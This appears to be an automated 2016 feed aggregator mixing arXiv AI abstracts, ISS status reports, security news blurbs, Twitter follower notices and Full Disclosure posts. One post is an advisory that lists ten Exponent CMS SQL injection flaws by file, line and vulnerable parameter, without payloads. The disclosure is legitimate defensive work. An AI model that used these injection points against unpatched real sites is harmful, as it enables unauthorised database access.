Limitations and Alternatives for the Evaluation of Large-scale Link Prediction. (arXiv:1611.00547v1 [cs.SI])

Link prediction, the problem of identifying missing links among a set of inter-related data entities, is a popular field of research due to its application to graph-like domains. Producing consistent evaluations of the performance of the many link prediction algorithms being proposed can be challenging due to variable graph properties, such as size and density. In this paper we first discuss traditional data mining solutions which are applicable to link prediction evaluation, arguing about their capacity for producing faithful and useful evaluations. We also introduce an innovative modification to a traditional evaluation methodology with the goal of adapting it to the problem of evaluating link prediction algorithms when applied to large graphs, by tackling the problem of class imbalance. We empirically evaluate the proposed methodology and, building on these findings, make a case for its importance on the evaluation of large-scale graph processing.

from cs.AI updates on arXiv.org http://ift.tt/2eBxf8V
via IFTTT

Chi d'amor non vuol le pene (Anonymous)

Chi d'amor non vuol le pene (Anonymous) ... Composer, Anonymous. Language, Italian. Piece Style, Baroque. Instrumentation, voice, continuo ...

from Google Alert - anonymous http://ift.tt/2ffJcEZ'amor_non_vuol_le_pene_(Anonymous)&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNETxFuDQtnN_2uvyrqHBwW__xSg4w
via IFTTT

ISS Daily Summary Report – 11/02/2016

Group Combustion Leak Check: CDR retrieved the Combustion Chamber from the Multi-Purpose Small Payload Rack (MSPR) Work Volume and installed a top plate on the Combustion Chamber.  The crew then installed a gas bottles and air supply lines to configure for a leak check.  Ground specialists are focusing the leak check on the Group Combustion quick disconnect and seals. The Group Combustion investigation tests a theory that fuel sprays change from partial to group combustion as flames spread across a cloud of droplets. In the Multi-purpose Small Payload Rack in the Kibo module, droplets of decane, a component of gasoline or kerosene, are arranged randomly on thin-fiber lattice points, and the flame and droplet positions and temperature distribution are measured as the flame spreads. Microgravity blocks convection, which on Earth would quickly disperse the droplets and combustion products before such measurements could be made. Veg-03 Operations: Today, CDR thinned out the plants in the Veggie facility to promote growth of the larger plants.  The crew then watered the plant pillows. The overall goal of Veg-03 is to further demonstrate proof-of concept for the Veggie plant growth chamber and the planting pillows using ‘Outregous’ Red Romaine lettuce.  Future long-duration missions into the solar system, will require a fresh food supply to supplement crew diets, which means growing crops in space. Previous investigations focused on improving productivity in controlled environments, but the limited quarters of the space shuttle and ISS made it difficult to conduct large-scale crop production tests. Veg-03 expands on previous validation tests of the new Veggie hardware, which crew members will soon use to grow cabbage, lettuce and other fresh vegetables in space. Tests determine which types of microorganisms are present in space-grown cabbage, providing baseline data for future crop-growing efforts.  Behavioral health surveys assess the impact of growing plants on crew morale and mood. Meteor Operations: CDR changed out the hard drive and diffraction grating on the Meteor camera located in the Window Observational Research Facility (WORF).  The Meteor payload is a visible spectroscopy instrument with the primary purpose of observing meteors in Earth orbit. Meteor uses image analysis to provide information on the physical and chemical properties of the meteoroid dust, such as size, density, and chemical composition. Since the parent comets or asteroids for most of the meteor showers are identified, the study of the meteoroid dust on orbit provides information about the parent comets and asteroids. Reboost:  Last night the ISS performed a reboost using the SM main engines. The purpose of the reboost was to finalize the planned conditions for the upcoming launches of 49S on 17-November 17 and 65P on 01-December.  Today’s Planned Activities All activities were completed unless otherwise noted. Combustion Integrated Rack Alignment Guide Removal ALGOMETRIYA. Pressure and Thermal Algometry preparation for and measurement session Regeneration of Micropurification Unit (БМП) Ф1 Cartridge (start) Meteor Shutter Open Public Affairs Office (PAO) High Definition (HD) Config LAB Setup XF305 Camcorder Setup Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Retrieval. Crew Prep for PAO TV-Conference with the Participants of the Russian Engineering Festival OTKLIK. Hardware Monitoring On-orbit hearing assessment using EARQ 24-hour ECG Recording (start) Combustion Chamber (CC) Top Plate Attachment Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Installation CONTURE-2. Installation of SW on RSK2 Laptop for Conture-2 Experiment on the RS. 24-hour Blood Pressure Recording (start) CONTURE-2. Experiment (Session 1). Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) Leak Trouble Shoot part 2 On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Exercise Data Downlink via OCA CONTURE-2 Experiment (Session 2). Health Maintenance System (HMS) Periodic Health Status (PHS) Photo/TV Camcorder Setup Verification VEG-03 Plant Thin VEG-03 Plant Pillow Prime. CONTURE-2. De-installation of master arm with adapter from panel 418 ISS Crew Orientation Crew time for ISS adaptation and orientation ALGOMETRIYA. Pressure Algometry Measurement Ops Familiarization with Auxiliary Computer System Manufacturing Device Print Removal, Clean and Stow Crew time for ISS adaptation and orientation Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ. Fill ЕДВ (КОВ) No.1242 from ЕДВ No.1233 METEOR Grating Configuration Public Affairs Office (PAO) High Definition (HD) Config LAB Setup СОЖ maintenance PAO Preparation Public Affairs Office (PAO) Event in High Definition (HD) – Lab INTERACTION-2. Experiment Ops. Video Footage of Greetings Photo/TV Camcorder Setup Verification Advanced Resistive Exercise Device (ARED) Exercise Video Stow ALGOMETRIYA. Pressure and Thermal Algometry Measurement Session. Closeout Ops Regeneration Micropurification Unit (БМП) Ф1 Absorption Cartridge (end) Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. SSRMS Power Up and Maneuver to Park Position P4 IEA Survey Three-Day Look Ahead: Thursday, 11/04: Cygnus cargo transfer, HRF blood collection setup, Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer Saturday, 11/06: Weekly Housekeeping  QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Shutdown Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2ehTLma
via IFTTT

Hundreds Of Operations Canceled After Malware Hacks Hospitals Systems

Computer viruses do not discriminate. They are not just hacking your email and online banking accounts anymore. Computer viruses do not distinguish between a personal computer or a hospital machine delivering therapy to patients — and the results could prove deadly. Cyber attacks on hospitals have emerged as a significant cyber security risk in 2016, which not only threaten highly sensitive

from The Hacker News http://ift.tt/2eXHg3c
via IFTTT

Anonymous user f578cd

Name, Anonymous user f578cd. User since, November 2, 2016. Number of add-ons developed, 1 theme. Average rating of developer's add-ons, Not ...

from Google Alert - anonymous http://ift.tt/2eXGMKF
via IFTTT

Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)

Over a month ago we reported about two critical zero-day vulnerabilities in the world's 2nd most popular database management software MySQL: MySQL Remote Root Code Execution (CVE-2016-6662) Privilege Escalation (CVE-2016-6663) At that time, Polish security researcher Dawid Golunski of Legal Hackers who discovered these vulnerabilities published technical details and proof-of-concept exploit

from The Hacker News http://ift.tt/2ff1gws
via IFTTT

Is it possible for people taking my jotform survey to remain anonymous?

Is it possible when using jotform to have the survey's participants return their surveys anonymously? Thank you in advance for your help. Tryn Collins.

from Google Alert - anonymous http://ift.tt/2egqkkL
via IFTTT

Anonymous And Met Police In Fierce War Of Words Over Million Mask March

PA Police in London have hit back at Anonymous UK's claims they are guilty of “pitiful aggression and violence” ahead of a potentially huge Million ...

from Google Alert - anonymous http://ift.tt/2fGK5ag
via IFTTT

I have a new follower on Twitter

Spiral.ac
Challenge every student! Spiral provides FREE tools for classroom-based collaborative learning with 1:1 devices. Get it here: https://t.co/BtlYquZ8DY
London
https://t.co/jhg8OifGTz
Following: 1745 - Followers: 2404

November 03, 2016 at 01:59AM via Twitter http://twitter.com/SpiralEducation

Yearly Arctic Sea Ice Age with Graph of Ice Age by Area: 1984 - 2016

One significant change in the Arctic region in recent years has been the rapid decline in perennial sea ice. Perennial sea ice, also known as multi-year ice, is the portion of the sea ice that survives the summer melt season. Perennial ice may have a life-span of nine years or more and represents the thickest component of the sea ice; perennial ice can grow up to four meters thick. By contrast, first year ice that grows during a single winter is generally at most two meters thick. This animation shows the Arctic sea ice age for the week of the minimum ice extent for each year, depicting the age in different colors. Younger sea ice, or first-year ice, is shown in a dark shade of blue while the ice that is four years old or older is shown as white. A color scale identifies the age of the intermediary years. Correction: The original release on 10/28/2016 incorrectly labeled the oldest category on the graph as "5+". This was corrected to read "4+" on 10/30/2016.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

I have a new follower on Twitter

Josh Luke
Gen X dude who wears socks with sandals. CEO, Healthcare futurist, #Alzheimers champ, #readmission guru, Family man, Author, Speaker. Enjoy hairbands & baseball
So Cal - USC Faculty
https://t.co/tN62ro9eWL
Following: 6582 - Followers: 6444

November 02, 2016 at 09:59PM via Twitter http://twitter.com/JoshLuke4Health

Bots as Virtual Confederates: Design and Ethics. (arXiv:1611.00447v1 [cs.CY])

The use of bots as virtual confederates in online field experiments holds extreme promise as a new methodological tool in computational social science. However, this potential tool comes with inherent ethical challenges. Informed consent can be difficult to obtain in many cases, and the use of confederates necessarily implies the use of deception. In this work we outline a design space for bots as virtual confederates, and we propose a set of guidelines for meeting the status quo for ethical experimentation. We draw upon examples from prior work in the CSCW community and the broader social science literature for illustration. While a handful of prior researchers have used bots in online experimentation, our work is meant to inspire future work in this area and raise awareness of the associated ethical issues.

from cs.AI updates on arXiv.org http://ift.tt/2fekWk5
via IFTTT

Natural-Parameter Networks: A Class of Probabilistic Neural Networks. (arXiv:1611.00448v1 [cs.LG])

Neural networks (NN) have achieved state-of-the-art performance in various applications. Unfortunately in applications where training data is insufficient, they are often prone to overfitting. One effective way to alleviate this problem is to exploit the Bayesian approach by using Bayesian neural networks (BNN). Another shortcoming of NN is the lack of flexibility to customize different distributions for the weights and neurons according to the data, as is often done in probabilistic graphical models. To address these problems, we propose a class of probabilistic neural networks, dubbed natural-parameter networks (NPN), as a novel and lightweight Bayesian treatment of NN. NPN allows the usage of arbitrary exponential-family distributions to model the weights and neurons. Different from traditional NN and BNN, NPN takes distributions as input and goes through layers of transformation before producing distributions to match the target output distributions. As a Bayesian treatment, efficient backpropagation (BP) is performed to learn the natural parameters for the distributions over both the weights and neurons. The output distributions of each layer, as byproducts, may be used as second-order representations for the associated tasks such as link prediction. Experiments on real-world datasets show that NPN can achieve state-of-the-art performance.

from cs.AI updates on arXiv.org http://ift.tt/2fjlW5p
via IFTTT

Collaborative Recurrent Autoencoder: Recommend while Learning to Fill in the Blanks. (arXiv:1611.00454v1 [cs.LG])

Hybrid methods that utilize both content and rating information are commonly used in many recommender systems. However, most of them use either handcrafted features or the bag-of-words representation as a surrogate for the content information but they are neither effective nor natural enough. To address this problem, we develop a collaborative recurrent autoencoder (CRAE) which is a denoising recurrent autoencoder (DRAE) that models the generation of content sequences in the collaborative filtering (CF) setting. The model generalizes recent advances in recurrent deep learning from i.i.d. input to non-i.i.d. (CF-based) input and provides a new denoising scheme along with a novel learnable pooling scheme for the recurrent autoencoder. To do this, we first develop a hierarchical Bayesian model for the DRAE and then generalize it to the CF setting. The synergy between denoising and CF enables CRAE to make accurate recommendations while learning to fill in the blanks in sequences. Experiments on real-world datasets from different domains (CiteULike and Netflix) show that, by jointly modeling the order-aware generation of sequences for the content information and performing CF for the ratings, CRAE is able to significantly outperform the state of the art on both the recommendation task based on ratings and the sequence generation task based on content information.

from cs.AI updates on arXiv.org http://ift.tt/2fggeCJ
via IFTTT

An application of incomplete pairwise comparison matrices for ranking top tennis players. (arXiv:1611.00538v1 [cs.AI])

Pairwise comparison is an important tool in multi-attribute decision making. Pairwise comparison matrices (PCM) have been applied for ranking criteria and for scoring alternatives according to a given criterion. Our paper presents a special application of incomplete PCMs: ranking of professional tennis players based on their results against each other. The selected 25 players have been on the top of the ATP rankings for a shorter or longer period in the last 40 years. Some of them have never met on the court. One of the aims of the paper is to provide ranking of the selected players, however, the analysis of incomplete pairwise comparison matrices is also in the focus. The eigenvector method and the logarithmic least squares method were used to calculate weights from incomplete PCMs. In our results the top three players of four decades were Nadal, Federer and Sampras. Some questions have been raised on the properties of incomplete PCMs and remains open for further investigation.

from cs.AI updates on arXiv.org http://ift.tt/2feiVEn
via IFTTT

Inferring Coupling of Distributed Dynamical Systems via Transfer Entropy. (arXiv:1611.00549v1 [cs.AI])

In this work, we are interested in structure learning for a set of spatially distributed dynamical systems, where individual subsystems are coupled via latent variables and observed through a filter. We represent this model as a directed acyclic graph (DAG) that characterises the unidirectional coupling between subsystems. Standard approaches to structure learning are not applicable in this framework due to the hidden variables, however we can exploit the properties of certain dynamical systems to formulate exact methods based on state space reconstruction. We approach the problem by using reconstruction theorems to analytically derive a tractable expression for the KL-divergence of a candidate DAG from the observed dataset. We show this measure can be decomposed as a function of two information-theoretic measures, transfer entropy and stochastic interaction. We then present two mathematically robust scoring functions based on transfer entropy and statistical independence tests. These results support the previously held conjecture that transfer entropy can be used to infer effective connectivity in complex networks.

from cs.AI updates on arXiv.org http://ift.tt/2fx3YBf
via IFTTT

Strong Neutrosophic Graphs and Subgraph Topological Subspaces. (arXiv:1611.00576v1 [cs.AI])

In this book authors for the first time introduce the notion of strong neutrosophic graphs. They are very different from the usual graphs and neutrosophic graphs. Using these new structures special subgraph topological spaces are defined. Further special lattice graph of subgraphs of these graphs are defined and described. Several interesting properties using subgraphs of a strong neutrosophic graph are obtained. Several open conjectures are proposed. These new class of strong neutrosophic graphs will certainly find applications in Neutrosophic Cognitive Maps (NCM), Neutrosophic Relational Maps (NRM) and Neutrosophic Relational Equations (NRE) with appropriate modifications.

from cs.AI updates on arXiv.org http://ift.tt/2fegcLm
via IFTTT

The new hybrid COAW method for solving multi-objective problems. (arXiv:1611.00577v1 [cs.NE])

In this article using Cuckoo Optimization Algorithm and simple additive weighting method the hybrid COAW algorithm is presented to solve multi-objective problems. Cuckoo algorithm is an efficient and structured method for solving nonlinear continuous problems. The created Pareto frontiers of the COAW proposed algorithm are exact and have good dispersion. This method has a high speed in finding the Pareto frontiers and identifies the beginning and end points of Pareto frontiers properly. In order to validation the proposed algorithm, several experimental problems were analyzed. The results of which indicate the proper effectiveness of COAW algorithm for solving multi-objective problems.

from cs.AI updates on arXiv.org http://ift.tt/2fx3Wt7
via IFTTT

TorchCraft: a Library for Machine Learning Research on Real-Time Strategy Games. (arXiv:1611.00625v1 [cs.LG])

We present TorchCraft, an open-source library that enables deep learning research on Real-Time Strategy (RTS) games such as StarCraft: Brood War, by making it easier to control these games from a machine learning framework, here Torch. This white paper argues for using RTS games as a benchmark for AI research, and describes the design and components of TorchCraft.

from cs.AI updates on arXiv.org http://ift.tt/2fegd1Q
via IFTTT

A Framework for Searching for General Artificial Intelligence. (arXiv:1611.00685v1 [cs.AI])

There is a significant lack of unified approaches to building generally intelligent machines. The majority of current artificial intelligence research operates within a very narrow field of focus, frequently without considering the importance of the 'big picture'. In this document, we seek to describe and unify principles that guide the basis of our development of general artificial intelligence. These principles revolve around the idea that intelligence is a tool for searching for general solutions to problems. We define intelligence as the ability to acquire skills that narrow this search, diversify it and help steer it to more promising areas. We also provide suggestions for studying, measuring, and testing the various skills and abilities that a human-level intelligent machine needs to acquire. The document aims to be both implementation agnostic, and to provide an analytic, systematic, and scalable way to generate hypotheses that we believe are needed to meet the necessary conditions in the search for general artificial intelligence. We believe that such a framework is an important stepping stone for bringing together definitions, highlighting open problems, connecting researchers willing to collaborate, and for unifying the arguably most significant search of this century.

from cs.AI updates on arXiv.org http://ift.tt/2fwXYbS
via IFTTT

Extensions and Limitations of the Neural GPU. (arXiv:1611.00736v1 [cs.NE])

The Neural GPU is a recent model that can learn algorithms such as multi-digit binary addition and binary multiplication in a way that generalizes to inputs of arbitrary length. We show that there are two simple ways of improving the performance of the Neural GPU: by carefully designing a curriculum, and by increasing model size. The latter requires careful memory management, as a naive implementation of the Neural GPU is memory intensive. We find that these techniques to increase the set of algorithmic problems that can be solved by the Neural GPU: we have been able to learn to perform all the arithmetic operations (and generalize to arbitrarily long numbers) when the arguments are given in the decimal representation (which, surprisingly, has not been possible before). We have also been able to train the Neural GPU to evaluate long arithmetic expressions with multiple operands that require respecting the precedence order of the operands, although these have succeeded only in their binary representation, and not with 100\% accuracy.

In addition, we attempt to gain insight into the Neural GPU by understanding its failure modes. We find that Neural GPUs that correctly generalize to arbitrarily long numbers still fail to compute the correct answer on highly-symmetric, atypical inputs: for example, a Neural GPU that achieves near-perfect generalization on decimal multiplication of up to 100-digit long numbers can fail on $000000\dots002 \times 000000\dots002$ while succeeding at $2 \times 2$. These failure modes are reminiscent of adversarial examples.

from cs.AI updates on arXiv.org http://ift.tt/2fek8LZ
via IFTTT

Building Machines That Learn and Think Like People. (arXiv:1604.00289v3 [cs.AI] UPDATED)

Recent progress in artificial intelligence (AI) has renewed interest in building systems that learn and think like people. Many advances have come from using deep neural networks trained end-to-end in tasks such as object recognition, video games, and board games, achieving performance that equals or even beats humans in some respects. Despite their biological inspiration and performance achievements, these systems differ from human intelligence in crucial ways. We review progress in cognitive science suggesting that truly human-like learning and thinking machines will have to reach beyond current engineering trends in both what they learn, and how they learn it. Specifically, we argue that these machines should (a) build causal models of the world that support explanation and understanding, rather than merely solving pattern recognition problems; (b) ground learning in intuitive theories of physics and psychology, to support and enrich the knowledge that is learned; and (c) harness compositionality and learning-to-learn to rapidly acquire and generalize knowledge to new tasks and situations. We suggest concrete challenges and promising routes towards these goals that can combine the strengths of recent neural network advances with more structured cognitive models.

from cs.AI updates on arXiv.org http://ift.tt/223IhEY
via IFTTT

Know Your Anonymous Audience

Know Your Anonymous Audience. More interaction and involvement versus a traditional lecture. CHALLENGE Steven Milligan M.D. is a faculty ...

from Google Alert - anonymous http://ift.tt/2eeOBHJ
via IFTTT

I have a new follower on Twitter

Jason Reid
Jason M. Reid, Esq. Board Certified Criminal Trial Expert, DUI attorney, injury attorney, and amateur sportswriter.
Bradenton, FL
http://t.co/ZLyDU8mBFz
Following: 12968 - Followers: 14474

November 02, 2016 at 01:44PM via Twitter http://twitter.com/attysportwriter

19-Year-Old Teenage Hacker Behind DDoS-for-Hire Service Pleads Guilty

Due to the worldwide promotion of Mirai botnet that knocked down half of the Internet last Friday, hackers and even script kiddies have started creating their own botnet networks by hacking millions of IoT devices and selling them as DDoS-for-hire service to overwhelm targets with data. A 19-year-old student from Hertford has pled guilty to running one such DDoS-for-hire service that shortly

from The Hacker News http://ift.tt/2fEJ6XX
via IFTTT

Ravens: WR Steve Smith (ankle), LB Elvis Dumervil (foot) not practicing Wednesday; LB C.J. Mosley (hamstring) returns (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Disclose [10 * cve] in Exponent CMS

Disclose 10 * cve in Exponent CMS [CVE-2016-7780] > In the line 42 of cron/find_help.php , $_GET['version'] can be > controlled and injected. It is possible to time-based blind SQL Inject > by the param of "version". fix: http://ift.tt/2f1bIr0 [CVE-2016-7781] > In the line 387 function getUserByName of > ./framework/modules/users/models/user.php , $name can be controlled and > injected. It is possible to time-based blind SQL Inject by the param of > "author". fix: In the line 169 of framework/modules/blog/controllers/blogController.php , $this->params['author'] has been escaped. http://ift.tt/2fbnFNP [CVE-2016-7782] > In the line 33 of ./framework/core/models/expConfig.php , > $this->location_data can be controlled and injected. It is possible to > time-based blind SQL Inject by the param of "src". fix:http://ift.tt/2fi0dut [CVE-2016-7783] > In the line 118 of ./framework/core/models/expRecord.php , $params can > be controlled and injected. It is possible to boolean-based and > time-based blind SQL Inject by the param of "title" . fix:http://ift.tt/2enNs43 [CVE-2016-7784] > This bug was found in the framework/core/subsystems/expRouter.php > It is possible to inject SQL code in the function getSection by > $_REQUEST['section']. fix:http://ift.tt/2fhXOQH [CVE-2016-7788] >In Exponent CMS <=2.3.9, In the line 74 of ./framework/modules/users/models/user.php , $username > can be controlled and injected.It is possible to time-based blind SQL > Inject by the param of "username". fix: In the line 127 of file framework/modules/users/controllers/loginController.php. http://ift.tt/2fbnFNP [CVE-2016-7789] >In Exponent CMS <=2.3.9, framework/modules/eaas/controllers/eaasController.php , $key can be > controlled. And in the line 33 of framework/core/models/expConfig.php, > $this->location_data can be controlled and injected. It is possible to > boolean-based blind SQL Inject by the param of apikey. fix:http://ift.tt/2fi0dut [CVE-2016-9019] > In Exponent CMS <=2.3.9, in the function activate_address of the file > framework/modules/addressbook/controllers/addressController.php, > $this->params['is_what'] can be controlled and injected. It is possible > to do time-based SQL inject by the param 'is_what'. fix:http://ift.tt/2fi0dut [CVE-2016-9020] > In exponentcms <=2.3.9, in the line 125 of file > framework/modules/help/controllers/helpController.php, > $this->params['version'] can be controlled and injected. it is possible > to SQL injection by the param of 'version'. Fix: In the line 55 of framework/modules/help/models/help_version.php , $version has been escaped by function expString::escape. http://ift.tt/2fbnFNP [CVE-2016-9087] > In exponentcms <=2.3.9, in the line 94 of file > framework/modules/filedownloads/controllers/filedownloadController.php, > $this->param['fileid'] can be controlled and injected. It is possible > to SQL inject by param fileid. Fix: In the line 94 of file framework/modules/filedownloads/controllers/filedownloadController.php , $this->params['fileid'] has been escaped by function expString::escape. http://ift.tt/2fbnFNP Reported By web-Obfuscator in dbappsecurity

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

[FD] MSIE 11 MSHTML CView::CalculateImageImmunity use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the second entry in that series. The below information is also available on my blog at http://ift.tt/2fhXQI9. There you can find a repro that triggered this issue in addition to the information below. Follow me on http://twitter.com/berendjanwever for daily browser bugs. MSIE 11 MSHTML CView::CalculateImageImmunity UAF ================================================ (The fix and CVE number for this bug are not known) Synopsis

Source: Gmail -> IFTTT-> Blogger

Anonymous Mouse

See what kind of products Anonymous Mouse () likes on Product Hunt.

from Google Alert - anonymous http://ift.tt/2e2dr2q
via IFTTT

I have a new follower on Twitter

Michael Semer
Providing #Branding | #ContentMarketing | #ContentWriting | #Copywriting | #InboundMarketing | #MarketingStrategy and more for agencies and brands alike.
Casa de Kiki, BevHills, CA
http://t.co/f0QdjbdlbH
Following: 4772 - Followers: 5007

November 02, 2016 at 10:54AM via Twitter http://twitter.com/michaelsemer

FSHISD rolls out new anonymous alerts tool

The Fort Sam Houston Independent School District has introduced a new communications tool called Anonymous Alerts®. The Anonymous Alerts ...

from Google Alert - anonymous http://ift.tt/2fcDMb8
via IFTTT

ISS Daily Summary Report – 11/01/2016

Extravehicular Mobility Unit (EMU) Maintenance:  The crew performed a half water dump and fill on EMU 3006 feedwater tanks and a full water dump and refill of EMUs 3003 and 3010 feeedwater tanks. These activities satisfy maintenance requirements for on-orbit stowage of the EMUs.  Urine Processing Assembly (UPA):  Last week, the crew demated the connection between the Fluid Control and Pump Assembly (FCPA) at Quick Disconnect (QD) 27 on the Pressure Control and Pump Assembly (PCPA) and performed a PCPA Remove & Replace (R&R). Today the crew re-mated QD27 to the new PCPA. Re-mating QD 27 will allow the FCPA pressure to be pumped down to a functional range and the Fault Detection Isolation and Recovery (FDIR) limit for the pressure sensor will be re-set to its nominal value post re-mate. Oxygen Generation Assembly (OGA) Hydrogen (H2) On-Orbit Replacement Unit (ORU) Cell #1:  Over the last few days, system experts discovered that Cell #1 voltage drop is becoming more severe than what was noticed previously. Per engineering team recommendation and Program concurrence, on Saturday the OGA was shut down due to OGA contamination and Cell #1 degradation. The team will further investigate whether to continue operating OGA with degraded Cell #1 or replace it with a suspect on-orbit H2 ORU. Cygnus Cargo Operations:  Today, the crew performed 30 minutes of Cygnus Cargo Operations from the Task List.  With this time, the crew has completed 10 hours of Cygnus Cargo Operations. Ground teams estimate 19 hours of Cygnus cargo operations remain. Today’s Planned Activities All activities were completed unless otherwise noted. Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Intravehicular Tissue Equivalent Proportional Counter (IV-TEPC) Relocate Meteor Shutter Open On-Orbit Hearing Assessment (O-OHA) with EarQ Software Setup and Test Regenerative Environmental Control and Life Support System (RGN) WSTA Fill ISS Crew Orientation Dose Tracker Data Entry Subject Total Organic Carbon Analyzer (TOCA) Sample Data Record Cygnus Cargo Operations Conference EDV (KOV) Separation for Elektron and ГЖС Flusing Regenerative Environmental Control and Life Support System (RGN) WSTA Fill Extravehicular Mobility Unit (EMU) Full Water Tank Dump and Fill СОЖ maintenance Extravehicular Mobility Unit (EMU) Swap Extravehicular Mobility Unit (EMU) Full Water Tank Dump and Fill Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup CONTUR-2. P/L Assembly Setup on panel 418 Urine Processor Assembly (UPA) QD27 Remate Closing Window Shutters 6, 8, 9, 12, 13, 14 USOS Window Shutter Close  Completed Task List Items HAM Radio Transceiver Swap Cygnus Cargo Operations Biomolecule Sequencer Sample Stop [Completed Saturday] PMA1 IMV Cone Screen Cleaning [Completed Saturday] Fluid Shifts Ziplock Inventory [Completed Saturday] Food Warmer Inspection [Completed Saturday] Data Prep for Return [Completed Saturday] Ground Activities All activities were completed unless otherwise noted. Lab MCA Full Calibration Reboost with SM Main Engines P4 IEA Survey Three-Day Look Ahead: Wednesday, 11/03: Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) retrieval/install/leak check, IV TEPC relocate from N2 to N3 Thursday, 11/04: Cygnus cargo transfer, HRF blood collection setup, Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer  QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Shutdown Urine Processing Assembly (UPA) Idle Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2fE6KUL
via IFTTT

Integrate with anonymous log-in module

When the module is used together with anonymous log-in (http://ift.tt/2e1Q9JM) the advanced aggregate module stops ...

from Google Alert - anonymous http://ift.tt/2ezvrNM
via IFTTT

Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System

Hey Webmasters, are you using Memcached to boost the performance of your website? Beware! It might be vulnerable to remote hackers. Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers. Memcached is a fabulous

from The Hacker News http://ift.tt/2emR1aq
via IFTTT

Microsoft Says Russian Hackers Using Unpatched Windows Bug Disclosed by Google

Google's Threat Analysis Group publically disclosed on Monday a critical zero-day vulnerability in most versions of Windows just 10 days after privately disclosed both zero days to Microsoft and Adobe. While Adobe rushed an emergency patch for its Flash Player software on October 26, Microsoft had yet to release a fix. Microsoft criticized Google's move, saying that the public disclosure of

from The Hacker News http://ift.tt/2ecQtRs
via IFTTT

Simplifying SSH keys and SSL Certs Management across the Enterprise using Key Manager Plus

With rapidly growing web-based services and widely expanding locations, organizations are using more and more SSL certificates as well as SSH keys than ever. From authentication, confidentiality, and integrity to preventing the organization from industrial espionage, SSL certificates play an important role. Managing SSL certificates across networks to ensure protection and prevent

from The Hacker News http://ift.tt/2e11oSL
via IFTTT

Arp 299: Black Holes in Colliding Galaxies

Is only one black hole spewing high energy radiation -- or two? To help find out, astronomers trained NASA's Earth-orbiting NuSTAR and Chandra telescopes on Arp 299, the enigmatic colliding galaxies expelling the radiation. The two galaxies of Arp 299 have been locked in a gravitational combat for millions of years, while their central black holes will soon do battle themselves. Featured, the high-resolution visible-light image was taken by Hubble, while the superposed diffuse glow of X-ray light was imaged by NuSTAR and shown in false-color red, green, and blue. NuSTAR observations show that only one of the central black holes is seen fighting its way through a region of gas and dust -- and so absorbing matter and emitting X-rays. The energetic radiation, coming only from the galaxy center on the right, is surely created nearby -- but outside -- the central black hole's event horizon. In a billion years or so, only one composite galaxy will remain, and only one central supermassive black hole. Soon thereafter, though, another galaxy may enter the fray. via NASA http://ift.tt/2f8LuDd

I have a new follower on Twitter

Andrew Thomas
Co-Founder & CRO of SkyBell. Writer at Inc, Forbes, HuffPo. #IoT & Crowdfunding Expert. Advisor & Speaker. YEC. USC. Snapchat: ibeapt
San Francisco, CA
https://t.co/gj15v3Xby1
Following: 3486 - Followers: 3941

November 02, 2016 at 12:04AM via Twitter http://twitter.com/apthomas

I have a new follower on Twitter

Marty Loughlin
Smart #datalake - #semantic #bigdata #fintech #analytics #hadoop #spark @CamSemantics Family, F1, Soccer, fast cars, cooking, cycling; Married to @marialoughlin
Boston, MA (from Dublin, Ire)
https://t.co/ILJHVSwKay
Following: 12107 - Followers: 15088

November 01, 2016 at 11:24PM via Twitter http://twitter.com/mloughlin

I have a new follower on Twitter

Chris Gadek
Head of Marketing | Growth @Doorman. Dandy. Rockstar lookalike. Full stack marketer. Data science nerd.
San Francisco, CA
https://t.co/Y4HPcGOfDr
Following: 9222 - Followers: 13348

November 01, 2016 at 08:54PM via Twitter http://twitter.com/dappermarketer

I have a new follower on Twitter

Internet Billboards
Official Twitter account for Internet Billboards. The Web Curated. Content #Curator's. #curation services. Hello, I am the founder Tom George. Follow US!
USA
https://t.co/ZnJMi4Q0gT
Following: 15862 - Followers: 19700

November 01, 2016 at 08:54PM via Twitter http://twitter.com/netbillboards

[FD] Microsoft Internet Explorer 9 MSHTML CAttrArray use-after-free details

